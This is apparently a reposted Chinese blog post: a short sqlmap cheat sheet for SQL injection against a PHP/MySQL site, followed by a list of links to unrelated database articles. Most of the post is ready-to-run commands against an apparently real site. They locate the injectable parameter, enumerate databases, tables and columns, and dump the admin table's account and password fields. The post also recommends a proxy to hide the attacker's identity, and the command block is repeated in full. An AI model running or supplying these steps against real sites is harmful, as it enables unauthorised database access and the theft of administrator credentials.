sqlmap注入常见用法一条龙 【转】
2013-11-14 03:24
232 查看
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangonlin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:
检查注入点
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 列数据库信息
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie
--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
--sql-query=QUERY 执行一个sql语句,不一定支持
检查注入点
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 列数据库信息
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie
--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
--sql-query=QUERY 执行一个sql语句,不一定支持
相关文章推荐
- [未解决]数据库异常:多步 OLE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。
- mysql忘记密码的解决办法
- mysql编码以及乱码分析
- Sql之表的连接总结
- <MySQL 5.6 Manual 原文翻译>show table status
- java连接MySql和Oracle简单实现
- Windows平台编译SQLite 3
- [原]SQL Server 远程过程调用失败——解决方法
- sql之独立子查询和相关子查询总结
- SQL Server 远程过程调用失败——解决方法
- MySQL错误代码大全
- 垂直分区和水平分区
- mybatis show sql
- 数据库存储过程学习
- SQL语句之二建表
- SQL语句一之建库
- sql server 怎么记录最新插入的数据(没有自动增长列)?
- MySql可视化工具MySQL Workbench使用教程
- oracle-单行函数
- C# 实现一个简单的图书管理系统(无数据库)新手教程1